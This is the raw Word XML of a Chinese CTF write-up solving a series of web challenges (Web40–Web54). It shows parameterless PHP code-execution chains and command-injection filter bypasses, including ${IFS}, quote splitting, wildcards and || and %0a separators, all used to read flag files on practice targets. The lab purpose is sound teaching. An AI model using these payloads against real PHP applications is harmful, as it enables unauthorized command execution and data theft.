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6584C">
      <w:pPr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Web40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（无参数命令执行（无参数rce就是不使用参数，而只使用一个个函数最终达到目的）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9A0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无参数命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47668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示例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取当前目录文件列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993B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以下代码展示了如何使用无参数函数组合来列出当前目录中的文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B81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print_r(scandir(current(localeconv())));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144331B0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解释：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57894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localeconv() 返回一个包含本地数字和货币格式信息的数组，其中第一个元素为 .（表示当前目录）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7B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current() 获取数组的第一个值，即 .。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18270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scandir() 列出指定目录中的文件和子目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F028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输出将是当前目录下所有文件和子目录的列表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A08A28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：读取文件内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D4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通过无参数函数读取文件内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F21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highlight_file(end(scandir(getcwd())));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C342B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解释：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0FF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getcwd() 获取当前工作目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1731B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scandir() 列出当前目录中的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC38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end() 将数组指针移动到最后一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B711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highlight_file() 显示指定文件的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523B8867">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：遍历上级目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF87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查看上一级目录中的文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D9C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print_r(scandir(dirname(getcwd())));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE1419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解释：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F7A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dirname() 获取路径的上一级目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1E731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E54C5E"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 随机读取文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B134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随机选择并读取当前目录中的文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C80D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highlight_file(array_rand(array_flip(scandir(getcwd()))));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC108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color w:val="E54C5E"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="E54C5E"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>解释：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A11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array_flip() 交换数组键和值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D61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array_rand() 随机返回数组中的一个键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C76E84C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF69E2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E538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</w:p>
    <w:p w14:paraId="634227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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1907540"/>
            <wp:effectExtent l="0" t="0" r="3175" b="698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09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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scandir() 函数返回指定目录中的文件和目录的数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D35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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print_r() 函数用于打印变量，以更容易理解的形式展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2471CA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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>localeconv()函数会返回一一个包含本地数字及货币格式信息的数组，该数组的第一个元素就是"."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C5C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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>current() 函数返回数组中的当前元素的值。别名是 pos()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F8C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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>array_reverse() 函数将原数组中的元素顺序翻转，创建新的数组并返回。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A5B3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"https://so.csdn.net/so/search?q=getcwd&amp;spm=1001.2101.3001.7020" \t "https://blog.csdn.net/2301_76690905/article/details/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getcwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>() :取得当前工作目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62257B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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>————————————————</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F04D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构造?c=print_r(scandir(pos(localeconv())));//意思是scandir(".") 相当于返回当前目录下文件的数组，最后用print_r输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC6DC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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="975360"/>
            <wp:effectExtent l="0" t="0" r="5080" b="571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B5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得到当前目录的数组，然后就要读出flag.php,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA92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C</w:t>
      </w:r>
      <w:r>
        <w:t>urrent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()-输出</w:t>
      </w:r>
      <w:r>
        <w:t>数组中的当前元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（pos()和current()是同一个东西）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073972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end()-将内部指针指向数组中的最后一个元素，并输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1D50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next()-将内部指针指向数组中的下一个元素，并输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252389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prev()-将内部指针指向数组中的上一个元素，并输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C4C3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reset()-将内部指针重新指向数组中的第一个元素，并输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE15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each()-返回当前元素的键名和键值，并将内部指针向前移动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DE0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0" w:right="0" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们可以先将数组倒过来，用array_reserve()把数组内元素顺序倒过来，flag就变成数组中的第二项，然后可以用next()取出。构造?c=print_r(next(array_reverse(scandir(pos(localeconv())))));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8A195C">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="939165"/>
            <wp:effectExtent l="0" t="0" r="1270" b="381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9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然后用highlight_file()或show_source()读出源码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C670600">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="1997075"/>
            <wp:effectExtent l="0" t="0" r="5080" b="317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5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方法2、get_defined_vars() 返回一个包含所有已定义变量列表的多维数组，这些变量包括环境变量、服务器变量和用户定义的变量。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array_pop() 是删除并返回数组最后一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505F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先构造/?c=print_r(get_defined_vars());读取所有已定义的变量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4548BE6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509270"/>
            <wp:effectExtent l="0" t="0" r="3810" b="508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C921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76CD0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用post提交参数，cmd=phpinfo();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发现post数组里面传入了值,数组末尾并没有新增元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E33801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6530" cy="1932305"/>
            <wp:effectExtent l="0" t="0" r="1270" b="127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25E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C75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由于get_defined_vars()返回的是一个多维数组，我们用current()可以获取到GET数组，用next()可以获取到POST数组，然后用array_pop()取出POST数组里面的元素，最后用eval执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，即构造?c=eval(array_pop(next(get_defined_vars())));然后用POST传1=system('tac fl*');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BFA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方法三、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBA8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（1）用?c=session_start();system(session_id());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C60B68D">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2177415"/>
            <wp:effectExtent l="0" t="0" r="635" b="381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A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可以看到有关PHPSESSID，修改值为ls,可以执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214248D">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="1399540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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7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但是由于php版本问题，只能这样了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2AA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方法4、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E07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 ?cmd=system("tac%20flag.php");&amp;c=eval(pos(pos(get_defined_vars())));（顺序不能反）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010C5B3B"/>
    <w:p w14:paraId="2EA9EE1C"/>
    <w:p w14:paraId="705CAF25">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5250180" cy="864235"/>
            <wp:effectExtent l="0" t="0" r="7620" b="254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9C50"/>
    <w:p w14:paraId="26B0E947"/>
    <w:p w14:paraId="247EF633"/>
    <w:p w14:paraId="77E1227C"/>
    <w:p w14:paraId="017CFB7B"/>
    <w:p w14:paraId="0FA0DD0C"/>
    <w:p w14:paraId="4DD9B401"/>
    <w:p w14:paraId="1F8A67F5"/>
    <w:p w14:paraId="41BA8964"/>
    <w:p w14:paraId="53984BED"/>
    <w:p w14:paraId="7FA56E3F"/>
    <w:p w14:paraId="6CA7DD23"/>
    <w:p w14:paraId="4827DA56"/>
    <w:p w14:paraId="4CC08389"/>
    <w:p w14:paraId="68AF44E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Web42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7F6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70755" cy="2695575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A426">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53AEF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&gt;/dev/null 2&gt;&amp;1：这是一个 shell 重定向操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4734C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&gt;：将标准输出（stdout）重定向。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D339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/dev/null：一个特殊的设备文件，丢弃所有写入它的数据（黑洞）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C5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2&gt;&amp;1：将标准错误（stderr）重定向到标准输出，最终也被丢弃。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164B7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整体作用：执行命令但不返回任何输出结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31812D6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; //分号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(可分隔命令)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C682B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%0a//换行符（代替分号的分隔命令的作用）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| //只执行后面那条命令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|| //只执行前面那条命令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&amp; //两条命令都会执行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&amp;&amp; //两条命令都会执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D2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可构造playload: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url/?c=tac flag.php||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url/?c=tac flag.php%26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注意，这里的&amp;需要url编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6E136">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498D7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 用；来分隔命令，可构造/？c=ls;66来执行命令ls,而66被重定向了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054A78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34683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FDB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02762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接着用/?c=tac flag.php;66来查看文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766F554F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A99AC86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CFA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Web43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B4D93">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="40481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6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本题与web42类似，多了分号和cat的限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7A6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cat可以用tac来绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23545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分号可以用||，%0a和&amp;(用url编码，即%26)来绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52251FC2">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="115824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69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988060"/>
            <wp:effectExtent l="0" t="0" r="19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34BC"/>
    <w:p w14:paraId="08910D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49717799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FEB2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Web44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55365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本题比web43多限制了flag,直接用通配符*就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A2B7A8">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4810125" cy="34004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2325">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1289685"/>
            <wp:effectExtent l="0" t="0" r="317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5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Web45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8A2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本题比web44多限制了空格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB797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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1、 c&lt;&gt;重定向符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8DAAD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 ${IFS}//IFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77771787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 $IFS$9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118D51B2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 {cat,11.php} //{,}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7561BBD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5、%09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A01980">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1002665"/>
            <wp:effectExtent l="0" t="0" r="31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8D60">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353039F7">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F7975F">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4916C803">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CA7284">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75ED7CC9">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F63494D">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F45593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Web46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098DECBE">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7453F264">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3574415" cy="1233805"/>
            <wp:effectExtent l="0" t="0" r="698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D89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本题多限制了*,$,[0-9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FAC67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其实*可以用fla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g.php代替</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFB27C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空格可以用&lt;&gt;和%09代替</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153C0838">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="601980"/>
            <wp:effectExtent l="0" t="0" r="127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00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Web47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C16B68C">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="993140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05B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本题多了对more,less,head,sort,tail的限制；但不影响上题构造的/?c=tac&lt;&gt;fl%27%27ag.php||a。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA5C47B">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="951865"/>
            <wp:effectExtent l="0" t="0" r="825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E9F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Web48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7414951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依旧没有影响</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="995045"/>
            <wp:effectExtent l="0" t="0" r="190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C614">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F10F41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Web49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D543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依旧没影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B40C3D1">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="428326A4">
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609CF25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Web50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C61A4DF"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782320"/>
            <wp:effectExtent l="0" t="0" r="571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8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这一题过滤多了 \x09|\x26/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC8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其中x09为十六进制，然后查ascll表 ，发现09为tab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26为&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64782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但是不影响做题，依旧使用/?c=tac&lt;&gt;fl%27%27ag.php||a。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF48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Web51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600B5AE">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="920750"/>
            <wp:effectExtent l="0" t="0" r="698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0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本题还把tac过滤了，但可以用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,\来分隔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640D4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即使用/?c=ta''c&lt;&gt;fl%27%27ag.php||a(也可以用nl代替tac，即?c=nl&lt;fla’‘g.php||)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F86B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Web52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7D518F">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5258435" cy="917575"/>
            <wp:effectExtent l="0" t="0" r="889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D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本题还把&lt;,&gt;过滤了，那就用${IFS}代替，即使用/?c=ta''c${IFS}fl%27%27ag.php||a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1360B1E8">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="884555"/>
            <wp:effectExtent l="0" t="0" r="444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B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发现这里没有flag,那就查找根目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3FE1A">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="1082040"/>
            <wp:effectExtent l="0" t="0" r="508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9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发现有flag，使用?c=t''ac${IFS}/f''lag||a得到答案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE74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Web53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A21D9F">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5256530" cy="1123950"/>
            <wp:effectExtent l="0" t="0" r="127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D34A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435EC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"&lt;br&gt;"：这是一个 HTML 标签，表示 换行（break line）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34430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本题没有重定向，不需要多个命令，直接用ta\c${IFS}fla\g.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F34D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Web54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603DB1CD">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="781050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65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以下子模式使用 .*（任意字符任意次数）包裹关键字，匹配包含该关键字的任意字符串（不区分大小写）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622E4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方法1、由于cat被过滤且不能用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来分隔，那就用？来匹配（不能直接用ca?,需要指明路径，当然也可以匹配more等），构造?c=/bin/?at${IFS}f???.php，然后看查源代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1B2A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19575" cy="8763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F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方法2、由于uniq没有被过滤，构造/?c=uniq${IFS}f???.php,然后看查源代码。</w:t>
      </w:r>
    </w:p>
